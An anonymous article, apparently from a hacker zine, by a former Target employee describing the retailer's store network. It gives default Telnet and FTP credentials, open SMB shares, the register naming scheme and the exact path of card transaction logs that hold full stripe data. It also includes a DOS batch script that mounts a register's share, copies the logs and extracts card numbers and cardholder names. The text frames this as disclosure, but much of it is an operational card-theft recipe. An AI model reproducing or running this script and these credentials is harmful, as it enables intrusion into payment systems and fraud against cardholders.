Target: For Credit Card Fraud

by Anonymous

I have debated whether or not to write this article for over a month since it has the potential to cause so much damage.  I decided that exposing Target's utter lack of network security would bring about change and, in the end, do more good than harm.

During my brief employment at Target, I spent most of my free time exploring their internal network.  It did not take me long to realize that there was an absence of any security.  All of the computers used by employees are on the same subnet in the network.  These computers include registers, employment kiosks, managers' computers, and backroom computers.

In addition, Target installed Cisco Aironet 802.11b routers to support their handheld scanners used for printing labels and storing items in the back room.  These routers do use WEP, but that is not a major hurdle to keep computers outside the store from hopping on the internal network and taking advantage of the network flaws to be outlined.

Those responsible for rolling out the network clearly gave no thought to security.  The networks are identical from store to store, so the flaws were not isolated to my particular Target location.  Every computer except the registers has Telnet set up.  You can control any computer with the username Target and either a blank password or Target as the password.  Every computer, including the registers, has SMB shares set up that allow a user to mount the root directory with no password required.  All computers also have FTP set up, and with the username Target and password Target, you get full access to the root directory.

This setup allows any user to retrieve employee records and confidential documents from the computers belonging to the stores' managers.  The most dangerous security oversight though, relates to the ability to connect to the stores' registers.

Every register has a share named cpos (common point of sale) that keeps logs for every credit card and debit card transaction for a week.  Included in these logs is, not only the credit card number and cardholder name for every transaction, but also a raw dump of the card's entire magnetic strip - for reasons unknown.  The exact location of these logs on the share is "\app\ej_backup\".  All registers follow the naming convention TxxxxREGyyyy - where "x" is the store number and "y" is the register number.  This convention is used company wide, and any workstation can connect to any register at any store.

I do not have much experience writing DOS batch files, but I managed to put together a simple batch file that connects to a register, passed as an argument, grabs all of the credit/debit logs, and strips out the account number and customer name.

net use z:\ \\%1\cpos
copy z:\app\ej_backup\*.* .
net use z: /delete
type *.pos | find /n "VISA CHARGE" >> temp
type *.pos | find /n "MASTERCARD CHARGE" >> temp
type *.pos | find /n "AMEX CHARGE" >> temp
type *.pos | find /n "DISCOVER CHARGE" >> temp
type *.pos | find /n "ACCT# (M)" >> temp
type *.pos | find /n "CARD HOLDER:" >> temp
sort /+1 temp >> stripped.log
erase temp
erase *.pos

Using this batch file, one could easily grab the transaction logs from every register at every store overnight.  Over a month, I imagine somebody could grab tens of thousands of credit card numbers.

I did not work at Target nearly long enough to explore their entire network, but one can only imagine what kind of confidential information could be obtained from their massive network.

Please do not use this information for malicious purposes.  I only wrote this article in the hopes that Target will be forced to change its lax security policies.